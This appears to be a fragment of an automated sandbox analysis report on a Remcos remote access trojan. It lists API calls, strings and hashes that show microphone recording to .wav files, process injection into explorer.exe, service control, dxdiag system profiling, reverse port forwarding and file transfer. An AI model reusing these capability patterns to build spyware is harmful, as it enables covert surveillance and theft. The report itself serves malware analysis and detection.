                                                                                                                                                                                                                                                                                                • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                                                                                                                                                                                                                                                                • API String ID: 2050909247-4145329354
                                                                                                                                                                                                                                                                                                • Opcode ID: ae628e6cf13d6acf56a74fe03314e9eaaf54e5537fc186528355c397fff7ef9b
                                                                                                                                                                                                                                                                                                • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae628e6cf13d6acf56a74fe03314e9eaaf54e5537fc186528355c397fff7ef9b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                                                                                                                                                                                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                                                                                                                                                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                                                                                                                                                                                                                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                                                                                                                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                                                                                                                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 221034970-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                                                                                                                                                                                                                                                                • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00446DDF
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00446DEB
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00446DF6
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00446E01
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00446E0C
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00446E17
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00446E22
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00446E2D
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00446E38
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00446E46
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                                                                                                                                                                                                • Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Eventinet_ntoa
                                                                                                                                                                                                                                                                                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                                                                                                                                                                                                                                                • API String ID: 3578746661-4192532303
                                                                                                                                                                                                                                                                                                • Opcode ID: a05e0ddbe8dc3814f036cc210c9733109e43822c73ea3fc4ff0ab9c9ada38e94
                                                                                                                                                                                                                                                                                                • Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a05e0ddbe8dc3814f036cc210c9733109e43822c73ea3fc4ff0ab9c9ada38e94
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DecodePointer
                                                                                                                                                                                                                                                                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                                                                                                                • API String ID: 3527080286-3064271455
                                                                                                                                                                                                                                                                                                • Opcode ID: 3eb206b15bda214751c6835efce86a307732660d26cd42cbd6c0713da10ca2d5
                                                                                                                                                                                                                                                                                                • Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3eb206b15bda214751c6835efce86a307732660d26cd42cbd6c0713da10ca2d5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 00416688
                                                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                                                                                                                                                                                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                                                                                                                                                                                                • API String ID: 1462127192-2001430897
                                                                                                                                                                                                                                                                                                • Opcode ID: 826bb05371ff64d740857fa337f72034cbc796444b6efc95c58373138809deed
                                                                                                                                                                                                                                                                                                • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 826bb05371ff64d740857fa337f72034cbc796444b6efc95c58373138809deed
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • _strftime.LIBCMT ref: 00401AD3
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                                                                                                                                                                                                • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                                                                                                                                                                                                                                                • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                                                                                                                                                                                                                                                • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                                                                                                                                                                                                • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                                                                                                                                                                                                                                                • API String ID: 3809562944-3643129801
                                                                                                                                                                                                                                                                                                • Opcode ID: 05fbe3f0275308aa01def130e1c9f559704be22902734a160a2ccb4d88025906
                                                                                                                                                                                                                                                                                                • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05fbe3f0275308aa01def130e1c9f559704be22902734a160a2ccb4d88025906
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                                                                                                                                                                                                                                                • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                                                                                                                                                                                                                                                                • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                                                                                                                                                                                                                                                • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                                                                                                                                                                                                                                                • waveInStart.WINMM ref: 00401A81
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                                                                                                                                                                                                                • String ID: XCG$`=G$x=G
                                                                                                                                                                                                                                                                                                • API String ID: 1356121797-903574159
                                                                                                                                                                                                                                                                                                • Opcode ID: ccd0c3bdb441db855719f52f26becbf2123e5d26e4d3fe3fdac9f84fbce65878
                                                                                                                                                                                                                                                                                                • Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ccd0c3bdb441db855719f52f26becbf2123e5d26e4d3fe3fdac9f84fbce65878
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                                                                                                                                                                                                                                                                                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                                                                                                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                                                                                                                                                                                                                                                                                                • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
                                                                                                                                                                                                                                                                                                • TranslateMessage.USER32(?), ref: 0041C9FB
                                                                                                                                                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 0041CA05
                                                                                                                                                                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                                                                                                                                                                                                • String ID: Remcos
                                                                                                                                                                                                                                                                                                • API String ID: 1970332568-165870891
                                                                                                                                                                                                                                                                                                • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                                                                                                                                                                                                • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: f2151e197df712fc1f3efd7529e5cab30ffe5da6e1140182427377c3cf1bf9f3
                                                                                                                                                                                                                                                                                                • Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f2151e197df712fc1f3efd7529e5cab30ffe5da6e1140182427377c3cf1bf9f3
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BD6
                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C59
                                                                                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00452C91
                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E03,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CEC
                                                                                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00452D3B
                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D03
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D7F
                                                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 00452DAA
                                                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 00452DB6
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 201697637-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 526ec53c1ec1ba6df620155d9200090ddd68624b921cdf3bb5e3273f0fe9ddbf
                                                                                                                                                                                                                                                                                                • Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 526ec53c1ec1ba6df620155d9200090ddd68624b921cdf3bb5e3273f0fe9ddbf
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                                                                                                                                • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00444714
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0044472D
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0044475F
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00444768
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00444774
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                                                                                                                                • String ID: C
                                                                                                                                                                                                                                                                                                • API String ID: 1679612858-1037565863
                                                                                                                                                                                                                                                                                                • Opcode ID: 26cb60d2ded69649c8d9c7e918b2274f2eed3a3cb47f2210c16fd85809fb6344
                                                                                                                                                                                                                                                                                                • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26cb60d2ded69649c8d9c7e918b2274f2eed3a3cb47f2210c16fd85809fb6344
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: tcp$udp
                                                                                                                                                                                                                                                                                                • API String ID: 0-3725065008
                                                                                                                                                                                                                                                                                                • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                                                                                                                                                                                                                • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 004017F4
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                                                                                                                                                                                                                                                                • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                                                                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                                                                                                                                                                                                • String ID: T=G$p[G$>G$>G
                                                                                                                                                                                                                                                                                                • API String ID: 1596592924-2461731529
                                                                                                                                                                                                                                                                                                • Opcode ID: 8f70ea2b40fb44211d0b69bbfe51e678a1d722ca5741e51af6e8456a38407156
                                                                                                                                                                                                                                                                                                • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f70ea2b40fb44211d0b69bbfe51e678a1d722ca5741e51af6e8456a38407156
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                                                                                                                                                                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                                                                                                                                                                                                • String ID: .part
                                                                                                                                                                                                                                                                                                • API String ID: 1303771098-3499674018
                                                                                                                                                                                                                                                                                                • Opcode ID: bc587de7adb1460b3aabd07d1d3e6798b8d85c5b62109ba090974b2b68d51c1e
                                                                                                                                                                                                                                                                                                • Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc587de7adb1460b3aabd07d1d3e6798b8d85c5b62109ba090974b2b68d51c1e
